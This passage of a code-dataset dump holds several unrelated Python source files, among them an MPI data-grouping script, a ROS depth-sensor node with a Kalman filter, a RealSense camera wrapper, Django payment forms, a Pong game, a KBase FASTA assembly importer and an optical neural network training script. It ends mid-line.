comm.Get_size()\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter = ';', encoding = 'ISO-8859-1')\ndf.head()\n\ndef reduce(num):\n dfR = df.filter(items = [df.columns[num]])\n dfGrouped = dfR.groupby([dfR.columns[0]]).size()\n print(dfGrouped)\n print(\"#####################################\")\n\nif rank == 0:\n comm.send(1, dest = 1) # ciudad\n comm.send(5, dest = 2) # clase\n comm.send(4, dest = 3) # dia\n comm.send(7, dest = 4) # gravedad\n\nif rank == 1:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 2:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 3:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 4:\n num = comm.recv(source = 0)\n reduce(num)\n","repo_name":"sortizs/pr4-hpc","sub_path":"mpi/mpi_acc.py","file_name":"mpi_acc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74267207526","text":"__author__ = 'Bartek'\nfrom .indor_exceptions import ClassPropertyNotFound\nfrom .xml_tree_factory import XmlTreeFactory\nfrom .xml_tree import XmlTree\n\n\nclass XmlTreeRegister(type(XmlTree)):\n def __init__(cls, name, bases, dic):\n cls.property_name_for_printer = 'pretty_name'\n if cls.property_name_for_printer not in dic:\n raise ClassPropertyNotFound(name, cls.property_name_for_printer)\n super(XmlTreeRegister, cls).__init__(name, bases, dic)\n XmlTreeFactory().add_class(name, cls)\n","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/xml_tree_register.py","file_name":"xml_tree_register.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42324065845","text":"#!/usr/bin/env python3\n\nimport ms5837_driver\nimport rospy\nimport time\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom ms5837.msg import ms5837_data\nfrom nav_msgs.msg import Odometry\nimport numpy as np\n\n\n# Choose seawater or freshwater depth calibration using ros param\n# freshwater = 997 kg/m^3\n# seawater = 1029 kg/m^3\n\n# def calculate(array):\n# mean = 0\n# #total = 0\n# if(len(array)>50):\n# array.pop(0)\n# mean = sum(array)\n# mean /= len(array)\n# #for point in array:\n # total += (point - mean) * (point - mean)\n #total /= len(array)\n #print(mean)\n #return mean\n\nclass KalmanFilter:\n\n def __init__(self, max_diff=100, process_noise_matrix=np.array([[0.001, 0.00000001, 0.00000001], [0.00000001, 0.0005, 0.00000001], [0.00000001, 0.00000001, 0.0001]])):\n # initialize the filter with random values\n self.KG = np.ones((3, 3)) # Kalman gain\n self.est = np.zeros((3, 3)) # last estimate (x,v,a)\n self.est_error = np.ones((3, 3)) # Error of the filter estimate\n self.process_noise_matrix = process_noise_matrix\n\n self.last_time = time.time() # for calculating dt\n\n # for sanity check on sensor value\n self.last_x_m = None\n self.max_diff = max_diff # the maximum error between two sensor readings for value to be thrown out\n\n def update(self, x_m, v_m, a_m, x_e, v_e, a_e):\n # pass in measure position, velocity, and acceleration along with error for each\n # check to make sure sensor value has not had catastrophic problem\n if self.last_x_m is None:\n self.last_x_m = x_m\n if abs(x_m - self.last_x_m) > self.max_diff:\n rospy.logerr(\"Sensor value error: change in measurement too large for one time step\")\n else:\n\n # if value is all good then continue to run time step step\n current_time = time.time()\n dt = current_time - 
self.last_time\n self.last_time = current_time\n\n # create our new estimate based on the model\n self.est = np.matmul(np.array([[1, dt, 1 / 2.0 * dt ** 2], [0, 1, dt], [0, 0, 1]]), self.est) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n rospy.logdebug(self.est)\n self.est_error = self.est_error * [[1, 0, 0], [0, 1, 0], [0, 0, 1]] + self.process_noise_matrix # prevent error from going to zero\n rospy.logdebug(self.est_error)\n\n # update estimate with new sensor values\n self.KG = self.est_error / (self.est_error + np.array([[x_e, 0, 0], [0, v_e, 0], [0, 0, a_e]])) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.est = self.est + np.matmul(self.KG, np.array([[x_m, 0, 0], [0, v_m, 0], [0, 0, a_m]]) - self.est)\n self.est_error = np.matmul((np.identity(3) - self.KG), self.est_error)\n\n self.last_x_m = x_m\n return self.est, self.est_error\n\n\nif __name__ == '__main__':\n try:\n # set up ros stuff\n data = []\n rospy.init_node('ms5837_node')\n fluid_density = rospy.get_param('~fluid_density', '1000')\n publish_odom = rospy.get_param('~publish_odom', True)\n publish_pose = rospy.get_param('~publish_pose', False)\n use_kalman_filter = rospy.get_param('~use_kalman_filter', False)\n depth_variance = rospy.get_param('~depth_variance', 0.001)\n tf_frame = rospy.get_param(\"~tf_frame\", \"depth_sensor_link\")\n\n pub = rospy.Publisher('rov/ms5837', ms5837_data, queue_size=1)\n rate = rospy.Rate(20) # 100Hz data read\n sensor = ms5837_driver.MS5837_02BA(bus=1) # Default I2C bus is 1 (Raspberry Pi 3)\n # sensor = ms5837.MS5837_02BA()\n\n sensor.setFluidDensity(int(fluid_density))\n time.sleep(1)\n # sensor.init must run immediately after installation of ms5837 object\n sensor.init()\n\n odom_pub = None\n pose_pub = None\n filter = None\n if publish_odom:\n odom_pub = rospy.Publisher(\"/rov/depth_odom\", Odometry, queue_size=1)\n if publish_pose:\n pose_pub = rospy.Publisher(\"/rov/depth_pose\", PoseWithCovarianceStamped, queue_size=1)\n if use_kalman_filter:\n filter = KalmanFilter(100)\n\n last_depth_m = 0 # the last sensor value for computing the velocity\n last_velocity_m = 0 # last velocity for computing acceleration\n last_time = time.time() # time of last read for computing velocity\n\n while not rospy.is_shutdown():\n msg = ms5837_data()\n\n sensor.read(oversampling=0) # maximum read rate of ~90Hz\n\n current_time = time.time()\n dt = current_time - last_time\n last_time = current_time\n\n # measured values for depth, velocity, acceleration\n velocity_m = (sensor.depth() - last_depth_m) / dt\n last_depth_m = sensor.depth()\n acceleration_m = (velocity_m - last_velocity_m) / dt\n last_velocity_m = velocity_m\n\n if use_kalman_filter:\n state, variance = filter.update(sensor.depth(), velocity_m, acceleration_m,\n depth_variance, depth_variance, depth_variance)\n depth = state[0, 0]\n velocity = state[1, 1]\n variance = [variance[0, 0], variance[1, 1]] # position and velocity variance\n else:\n depth = sensor.depth()\n\n velocity = velocity_m\n variance = [depth_variance, depth_variance]\n\n msg.tempC = sensor.temperature(ms5837_driver.UNITS_Centigrade)\n msg.tempF = sensor.temperature(ms5837_driver.UNITS_Farenheit)\n msg.depth = sensor.depth()\n # msg.altitudeM = sensor.altitude() # causes error in driver\n\n # update message headers\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = 'depth_data'\n\n pub.publish(msg)\n\n if publish_odom:\n msg = Odometry()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = float(depth)\n data.append(depth)\n # 
if(len(data) >= 50):\n # msg.pose.pose.position.z = float(calculate(data))\n time_now = time.time()\n msg.twist.twist.linear.z = float(velocity)\n last_time = time_now\n msg.pose.covariance[14] = variance[0]\n msg.twist.covariance[14] = variance[1]\n odom_pub.publish(msg)\n\n if publish_pose:\n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = 1#sensor.depth() #(float(depth) - 193)\n msg.pose.covariance[14] = variance[0]\n pose_pub.publish(msg)\n\n rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"MUsurf/Jelly_ROS_22-23","sub_path":"catkin_ws/src/ms5837/src/ms5837_ros.py","file_name":"ms5837_ros.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1477214775","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass Realsense_Module():\n WIDTH = 640\n HEIGHT = 480\n FPS = 30\n def __init__(self,device = \"218622271154\") :\n #RGBとdepthの初期設定\n self.conf = rs.config()\n self.conf.enable_device(device)\n #解像度はいくつか選択できる\n self.conf.enable_stream(rs.stream.color, self.WIDTH, self.HEIGHT, rs.format.bgr8, self.FPS)\n self.conf.enable_stream(rs.stream.depth, self.WIDTH, self.HEIGHT, rs.format.z16, self.FPS)\n #stream開始\n self.pipe = rs.pipeline()\n self.profile = self.pipe.start(self.conf)\n #Alignオブジェクト生成(位置合わせのオブジェクト)\n self.align_to = rs.stream.color\n self.align = rs.align(self.align_to)\n #カメラ情報の取得(内パラ)\n self.depth_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.depth)).get_intrinsics()\n self.color_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.color)).get_intrinsics()\n\n def obtain_camera_prame(self):\n R=[self.color_intrinsics.fx,\n self.color_intrinsics.fy,\n self.WIDTH/2,\n self.HEIGHT/2\n ]\n return R\n\n def obtain_cam_image(self) :\n try :\n #フレーム待ち(これがないとデータの取得にエラーが出ることがあるらしい)\n frames = self.pipe.wait_for_frames()\n # get_frame_data\n aligned_frames = self.align.process(frames)\n color_frame = aligned_frames.get_color_frame()\n depth_frame = aligned_frames.get_depth_frame()\n depth_frame = self.depth_filter(depth_frame)\n if not depth_frame or not color_frame:\n return\n #dataがunit16の形で入っているのでnumpy配列に変更\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(depth_frame.get_data())\n img_flag=True\n return color_image,depth_image,depth_frame,img_flag\n except Exception as e :\n print(e)\n color_image=None\n depth_image=None\n depth_frame=None\n img_flag=False\n return color_image,depth_image,depth_frame,img_flag\n\n def obtain_point(self,result_frame,box_result) :\n result_pos=[]\n for u_v in box_result :\n u = int(u_v[0])\n v = int(u_v[1])\n #3次元座標推定\n i_d = result_frame.get_distance(u,v) #距離推定\n point = rs.rs2_deproject_pixel_to_point(self.color_intrinsics , [u,v], i_d) #カメラ座標のx,y取得\n result_pos.append(point)\n return result_pos\n \n def depth_filter(self,depth_frame):\n #TODO recursive median filterを入れる\n # decimarion_filterのパラメータ\n decimate = rs.decimation_filter()\n decimate.set_option(rs.option.filter_magnitude, 1)\n # spatial_filterのパラメータ\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 1)\n spatial.set_option(rs.option.filter_smooth_alpha, 0.25)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n # hole_filling_filterのパラメータ\n hole_filling = rs.hole_filling_filter()\n # disparity\n depth_to_disparity = rs.disparity_transform(True)\n 
disparity_to_depth = rs.disparity_transform(False)\n # filterをかける\n filter_frame = decimate.process(depth_frame)\n filter_frame = depth_to_disparity.process(filter_frame)\n filter_frame = spatial.process(filter_frame)\n filter_frame = disparity_to_depth.process(filter_frame)\n filter_frame = hole_filling.process(filter_frame)\n result_frame = filter_frame.as_depth_frame()\n return result_frame\n\n def limit_area(self,color_image,depth_image,left=0,right=600,top=0,bottom=500):\n lim_colorimage=color_image[left:right,top:bottom,:]\n lim_depth_image=depth_image[left:right,top:bottom]\n return lim_colorimage,lim_depth_image\n\n def shutdown(self):\n self.pipe.stop()\n\n\n","repo_name":"Hibikino-Toms-Robot/image_process","sub_path":"image_node/realsense_setup.py","file_name":"realsense_setup.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31698708414","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom projects.models import Project\nfrom payments.models import Payments\nUser = get_user_model()\n\n# pay project based form\nclass PaymentsProjectForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n class Meta:\n model = Payments\n fields = [\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n\n\n# pay to direct worker form\nclass PaymentWorkerForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n\n class Meta:\n model = Payments\n fields = [\n 'project',\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'project': forms.Select(attrs={'class': 'form-control'}), \n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n","repo_name":"alfinarif/project-management-application","sub_path":"payments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70817389927","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.bgcolor(\"#191919\")\nscreen.setup(width=800, height=600)\nscreen.title(\"PyPong\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(r_paddle.move_up, \"Up\")\nscreen.onkey(r_paddle.move_down, \"Down\")\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\n\ngame_on = True\nwhile game_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n # Collision with top and bottom walls\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n # Collision with paddles\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n # detect misses\n # right player\n if ball.xcor() > 380:\n ball.reset_position()\n scoreboard.l_point()\n\n # left player\n if ball.xcor() < -380:\n ball.reset_position()\n 
scoreboard.r_point()\n\nscreen.exitonclick()\n","repo_name":"cmlohr/py-pong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8163196434","text":"import json\nimport os\nimport os.path\nfrom pathlib import Path\nimport sys\nimport uuid\nfrom typing import List, Callable\nfrom collections import Counter\nfrom hashlib import md5\n\nfrom Bio import SeqIO\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\n\n\n_WSID = 'workspace_id'\n_MCL = 'min_contig_length'\n_INPUTS = 'inputs'\n_FILE = 'file'\n_NODE = 'node'\n_ASSEMBLY_NAME = 'assembly_name'\n\n\ndef _upa(object_info):\n return f'{object_info[6]}/{object_info[0]}/{object_info[4]}'\n\nclass FastaToAssembly:\n\n # Note added X due to kb|g.1886.fasta\n _VALID_CHARS = \"-ACGTUWSMKRYBDHVNX\"\n _AMINO_ACID_SPECIFIC_CHARACTERS = \"PLIFQE\"\n def __init__(self,\n dfu: DataFileUtil,\n scratch: Path,\n uuid_gen: Callable[[], uuid.UUID] = lambda: uuid.uuid4()):\n self._scratch = scratch\n self._dfu = dfu\n self._uuid_gen = uuid_gen\n\n def import_fasta(self, params):\n print('validating parameters')\n mass_params = self._set_up_single_params(params)\n return self._import_fasta_mass(mass_params)[0]\n\n def import_fasta_mass(self, params):\n print('validating parameters')\n self._validate_mass_params(params)\n return self._import_fasta_mass(params)\n\n def _import_fasta_mass(self, params):\n # For now this is completely serial, but theoretically we could start uploading\n # Blobstore nodes when some fraction of the initial checks are done, start uploading\n # Workspace obects when some fraction of the Blobstore nodes are done, parallelize\n # the file filtering / parsing, etc.\n # For now keep it simple\n # Also note all the assembly data is kept in memory once parsed, but it contains\n # no sequence info and so shouldn't be too huge. Could push to KBase in batches or\n # save to disk if that's an issue\n # We also probably want to add some retries for saving data, but that should go\n # in DataFileUtils if it's not there already\n # Finally, if more than 1G worth of assembly object data is sent to the workspace at once,\n # the call will fail. May need to add some checking / splitting code around this.\n if _FILE in params[_INPUTS][0]:\n input_files = self._stage_file_inputs(params[_INPUTS])\n else:\n input_files = self._stage_blobstore_inputs(params[_INPUTS])\n\n mcl = params.get(_MCL)\n assembly_data = []\n output = []\n for i in range(len(input_files)):\n # Hmm, all through these printouts we should really put the blobstore node here as\n # well as the file if it exists... 
wait and see if that code path is still actually\n # used\n if mcl:\n print(f'filtering FASTA file {input_files[i]} by contig length '\n + f'(min len={mcl} bp)')\n input_files[i] = self._filter_contigs_by_length(input_files[i], mcl)\n output.append({'filtered_input': str(input_files[i]) if mcl else None})\n print(f'parsing FASTA file: {input_files[i]}')\n assdata = self._parse_fasta(\n input_files[i],\n params[_INPUTS][i].get('contig_info') or {})\n print(f' - parsed {assdata[\"num_contigs\"]} contigs, {assdata[\"dna_size\"]} bp')\n if not assdata[\"num_contigs\"]:\n raise ValueError(\"Either the original FASTA file contained no sequences or they \"\n + \"were all filtered out based on the min_contig_length \"\n + f\"parameter for file {input_files[i]}\")\n assembly_data.append(assdata)\n\n print('saving assemblies to KBase')\n file_handles = self._save_files_to_blobstore(input_files)\n assobjects = []\n for assdata, file_handle, inputs, sourcefile in zip(\n assembly_data, file_handles, params[_INPUTS], input_files):\n ao = self._build_assembly_object(assdata, file_handle, inputs)\n assobjects.append(ao)\n # this appears to be completely unused\n with open(sourcefile.parent / \"example.json\", \"w\") as f:\n json.dump(ao, f)\n\n # save to WS and return\n assembly_infos = self._save_assembly_objects(\n params[_WSID],\n [p[_ASSEMBLY_NAME] for p in params[_INPUTS]],\n assobjects\n )\n for out, ai in zip(output, assembly_infos):\n out['upa'] = _upa(ai)\n return output\n\n def _build_assembly_object(self, assembly_data, fasta_file_handle_info, params):\n \"\"\" construct the WS object data to save based on the parsed info and params \"\"\"\n assembly_data['assembly_id'] = params[_ASSEMBLY_NAME]\n assembly_data['fasta_handle_ref'] = fasta_file_handle_info['handle']['hid']\n assembly_data['fasta_handle_info'] = fasta_file_handle_info\n\n assembly_data['type'] = 'Unknown'\n if 'type' in params:\n assembly_data['type'] = params['type']\n\n if 'external_source' in params:\n assembly_data['external_source'] = params['external_source']\n\n if 'external_source_id' in params:\n assembly_data['external_source_id'] = params['external_source_id']\n\n if 'external_source_origination_date' in params:\n # TODO this is an arbitrary string, which isn't useful. If this field is actually\n # used, make a new field with a standard timestamp format (epoch date?), validate that\n # format, and deprecate this field\n assembly_data['external_source_origination_date'] = params['external_source_origination_date']\n\n return assembly_data\n\n def _parse_fasta(self, fasta_file_path: Path, extra_contig_info):\n \"\"\" Do the actual work of inspecting each contig \"\"\"\n\n # TODO TEST this needs more extensive unit testing\n # variables to store running counts of things\n total_length = 0\n base_counts = {'A': 0, 'G': 0, 'C': 0, 'T': 0}\n md5_list = []\n\n # map from contig_id to contig_info\n all_contig_data = {}\n\n for record in SeqIO.parse(str(fasta_file_path), \"fasta\"):\n # SeqRecord(seq=Seq('TTAT...', SingleLetterAlphabet()),\n # id='gi|113968346|ref|NC_008321.1|',\n # name='gi|113968346|ref|NC_008321.1|',\n # description='gi|113968346|ref|NC_008321.1| Shewanella sp. 
MR-4 chromosome, complete genome',\n # dbxrefs=[])\n\n sequence = str(record.seq).upper()\n\n contig_info = {\n 'contig_id': record.id,\n 'name': record.id,\n 'description': record.description[len(record.id):].strip(),\n 'length': len(record.seq)\n }\n\n # 1) compute sequence character statistics running total\n total_length += contig_info['length']\n sequence_count_table = dict(Counter(sequence))\n for character in sequence_count_table:\n if character in base_counts:\n base_counts[character] = base_counts[character] + sequence_count_table[character]\n else:\n base_counts[character] = sequence_count_table[character]\n if character not in self._VALID_CHARS:\n if character in self._AMINO_ACID_SPECIFIC_CHARACTERS:\n raise ValueError('This FASTA file may have amino acids in it instead '\n 'of the required nucleotides.')\n raise ValueError(f\"This FASTA file has non nucleic acid characters: \"\n f\"{character}\")\n\n # 2) record number of 'N' characters (only set if there are some)\n Ncount = 0\n if 'N' in sequence_count_table:\n Ncount = sequence_count_table['N']\n contig_info['Ncount'] = Ncount\n\n # 2b) record if the contig is circular\n # TODO should throw an error if ECI has invalid record IDs\n if record.id in extra_contig_info:\n if 'is_circ' in extra_contig_info[record.id]:\n # TODO supposed to be a boolean, should check for 1 or 0\n contig_info['is_circ'] = int(extra_contig_info[record.id]['is_circ'])\n if 'description' in extra_contig_info[record.id]:\n contig_info['description'] = str(extra_contig_info[record.id]['description'])\n\n # 3) record md5 checksum\n contig_md5 = md5(sequence.encode()).hexdigest()\n contig_info['md5'] = contig_md5\n md5_list.append(contig_md5)\n\n # 4) record the all important GC to ~3 significant digits\n GC_count = 0\n for base in ['G', 'C']:\n if base in sequence_count_table:\n GC_count += sequence_count_table[base]\n contig_info['gc_content'] = round(float(GC_count) / float(contig_info['length']), 5)\n\n # 5) add to contig list\n if contig_info['contig_id'] in all_contig_data:\n raise ValueError('The FASTA header key ' + contig_info['contig_id'] +\n 'appears more than once in the file')\n\n all_contig_data[contig_info['contig_id']] = contig_info\n\n # Aggregate stats for the data\n total_gc_content = None\n if total_length > 0:\n total_gc_content = round(float(base_counts['G'] + base_counts['C']) / float(total_length), 5)\n assembly_data = {\n 'md5': md5(\",\".join(sorted(md5_list)).encode()).hexdigest(),\n 'base_counts': base_counts,\n 'dna_size': total_length,\n 'gc_content': total_gc_content,\n 'contigs': all_contig_data,\n 'num_contigs': len(all_contig_data)\n }\n return assembly_data\n\n @staticmethod\n def _fasta_filter_contigs_generator(fasta_record_iter, min_contig_length):\n \"\"\" generates SeqRecords iterator for writing from a legacy contigset object \"\"\"\n rows = 0\n rows_added = 0\n for record in fasta_record_iter:\n rows += 1\n if len(record.seq) >= min_contig_length:\n rows_added += 1\n yield record\n print(f' - filtered out {rows - rows_added} of {rows} contigs that were shorter '\n f'than {(min_contig_length)} bp.')\n\n def _filter_contigs_by_length(self, fasta_file_path: Path, min_contig_length) -> Path:\n \"\"\" removes all contigs less than the min_contig_length provided \"\"\"\n filtered_fasta_file_path = Path(str(fasta_file_path) + '.filtered.fa')\n\n fasta_record_iter = SeqIO.parse(str(fasta_file_path), 'fasta')\n SeqIO.write(self._fasta_filter_contigs_generator(fasta_record_iter, min_contig_length),\n 
str(filtered_fasta_file_path), 'fasta')\n\n return filtered_fasta_file_path\n\n def _save_assembly_objects(self, workspace_id, assembly_names, ass_data):\n print('Saving Assemblies to Workspace')\n sys.stdout.flush()\n ws_inputs = []\n for assname, assdata_singular in zip(assembly_names, ass_data):\n ws_inputs.append({\n 'type': 'KBaseGenomeAnnotations.Assembly', # This should really be versioned...\n 'data': assdata_singular,\n 'name': assname\n })\n return self._dfu.save_objects({'id': workspace_id, 'objects': ws_inputs})\n\n def _save_files_to_blobstore(self, files: List[Path]):\n print(f'Uploading FASTA files to the Blobstore')\n sys.stdout.flush()\n blob_input = [{'file_path': str(fp), 'make_handle': 1} for fp in files]\n return self._dfu.file_to_shock_mass(blob_input)\n\n def _stage_file_inputs(self, inputs) -> List[Path]:\n in_files = []\n for inp in inputs:\n if not os.path.isfile(inp[_FILE]):\n raise ValueError(\n \"KBase Assembly Utils tried to save an assembly, but the calling \"\n + f\"application specified a file ('{inp[_FILE]}') that is missing. \"\n + \"Please check the application logs for details.\")\n # Ideally we'd have some sort of security check here but the DTN files could\n # be mounted anywhere...\n # TODO check with sysadmin about this - checked, waiting on clear list of safedirs\n fp = Path(inp[_FILE]).resolve(strict=True)\n # make the downstream unpack call unpack into scratch rather than wherever the\n # source file might be\n file_path = self._create_temp_dir() / fp.name\n # symlink doesn't work, because in DFU filemagic doesn't follow symlinks, and so\n # DFU won't unpack symlinked files\n os.link(fp, file_path)\n in_files.append(file_path)\n # extract the file if it is compressed\n # could add a target dir argument to unpack_files, not sure how much work that might be\n fs = [{'file_path': str(fp), 'unpack': 'uncompress'} for fp in in_files]\n unpacked_files = self._dfu.unpack_files(fs)\n return [Path(uf['file_path']) for uf in unpacked_files]\n\n def _stage_blobstore_inputs(self, inputs) -> List[Path]:\n blob_params = []\n for inp in inputs:\n blob_params.append({\n 'shock_id': inp[_NODE],\n 'file_path': str(self._create_temp_dir()),\n 'unpack': 'uncompress' # Will throw an error for archives\n })\n dfu_res = self._dfu.shock_to_file_mass(blob_params)\n return [Path(dr['file_path']) for dr in dfu_res]\n\n def _create_temp_dir(self):\n tmpdir = self._scratch / (\"import_fasta_\" + str(self._uuid_gen()))\n os.makedirs(tmpdir, exist_ok=True)\n return tmpdir\n\n def _set_up_single_params(self, params):\n inputs = dict(params)\n ws_id = self._get_int(inputs.pop(_WSID, None), _WSID)\n ws_name = inputs.pop('workspace_name', None)\n if (bool(ws_id) == bool(ws_name)): # xnor\n raise ValueError(f\"Exactly one of a {_WSID} or a workspace_name must be provided\")\n if not ws_id:\n print(f\"Translating workspace name {ws_name} to a workspace ID. 
Prefer submitting \"\n + \"a workspace ID over a mutable workspace name that may cause race conditions\")\n ws_id = self._dfu.ws_name_to_id(params['workspace_name'])\n\n if not inputs.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Required parameter {_ASSEMBLY_NAME} was not defined\")\n\n # one and only one of either 'file' or 'shock_id' is required\n file_ = inputs.pop(_FILE, None)\n shock_id = inputs.pop('shock_id', None)\n if (bool(file_) == bool(shock_id)): # xnor\n raise ValueError(f\"Exactly one of {_FILE} or shock_id is required\")\n if file_:\n if not isinstance(file_, dict) or 'path' not in file_:\n raise ValueError('When specifying a FASTA file input, \"path\" field was '\n + f'not defined in \"{_FILE}\"')\n mass_params = {\n _WSID: ws_id,\n # Ideally set of minimum of 2 here, but left at 1 for backwards compatibility\n _MCL: self._get_int(inputs.pop(_MCL, None), f\"If provided, {_MCL}\"),\n _INPUTS: [inputs]\n }\n if file_:\n inputs[_FILE] = params[_FILE]['path']\n else:\n inputs[_NODE] = params['shock_id']\n return mass_params\n\n def _validate_mass_params(self, params):\n ws_id = self._get_int(params.get(_WSID), _WSID)\n if not ws_id:\n raise ValueError(f\"{_WSID} is required\")\n inputs = params.get(_INPUTS)\n if not inputs or type(inputs) != list:\n raise ValueError(f\"{_INPUTS} field is required and must be a non-empty list\")\n for i, inp in enumerate(inputs, start=1):\n if type(inp) != dict:\n raise ValueError(f\"Entry #{i} in {_INPUTS} field is not a mapping as required\")\n file_ = inputs[0].get(_FILE)\n if bool(file_) == bool(inputs[0].get(_NODE)): # xnor\n raise ValueError(f\"Entry #1 in {_INPUTS} field must have exactly one of \"\n + f\"{_FILE} or {_NODE} specified\")\n field = _FILE if file_ else _NODE\n for i, inp in enumerate(inputs, start=1):\n if not inp.get(field):\n raise ValueError(\n f\"Entry #{i} in {_INPUTS} must have a {field} field to match entry #1\")\n if not inp.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Missing {_ASSEMBLY_NAME} field in {_INPUTS} entry #{i}\")\n self._get_int(params.get(_MCL), f\"If provided, {_MCL}\", minimum=2)\n\n def _get_int(self, putative_int, name, minimum=1):\n if putative_int is not None:\n if type(putative_int) != int:\n raise ValueError(f\"{name} must be an integer, got: {putative_int}\")\n if putative_int < minimum:\n raise ValueError(f\"{name} must be an integer >= {minimum}\")\n return putative_int\n","repo_name":"kbaseapps/AssemblyUtil","sub_path":"lib/AssemblyUtil/FastaToAssembly.py","file_name":"FastaToAssembly.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4536169800","text":"'''\nThis file contains functionalities for training and loading the various models that were designed in this project.\nBased on the codebase at https://github.com/mike-fang/imprecise_optical_neural_network. 
The majority of the file is my own code.\n\n@version 3.8.2021\n'''\n\n\nimport numpy as np\nprint(1)\nimport torch as th\nprint(2)\nimport matplotlib.pylab as plt\nprint(3)\nfrom optical_nn import *\nprint(4)\nimport complex_torch_var as ct\nprint(5)\nfrom mnist import *\nprint(6)\nimport os\nprint(7)\nfrom time import time\nprint(8)\nfrom functools import partial\nprint(9)\nfrom glob import glob\nprint(10)\nfrom default_params import *\nprint(11)\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('runs/QONN')\nprint(\"writer created\")\n\n\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n# Good learning rates for different networks\nLR_FFT = 5e-2\nLR_GRID = 2.5e-4\nLR_COMPLEX = 5e-3\n\n'''\nTrain networks based on ComplexNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_complex(f=F_COMPLEX_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 10\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = 1.0e-3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_complex(hidden_units=n_h)\n print(net)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params, writer=writer)\n optim_params['lr'] /= 5\n\n train(net, **train_params, optim_params=optim_params, writer=writer, iteration = 1)\n acc = get_acc(net)\n\n print(f'Trained ComplexNet with accuracy {acc}.')\n writer.close()\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on a modified GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_cgrd(f=F_CGRD_TRAIN):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(unitary=CGRDUnitary)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = 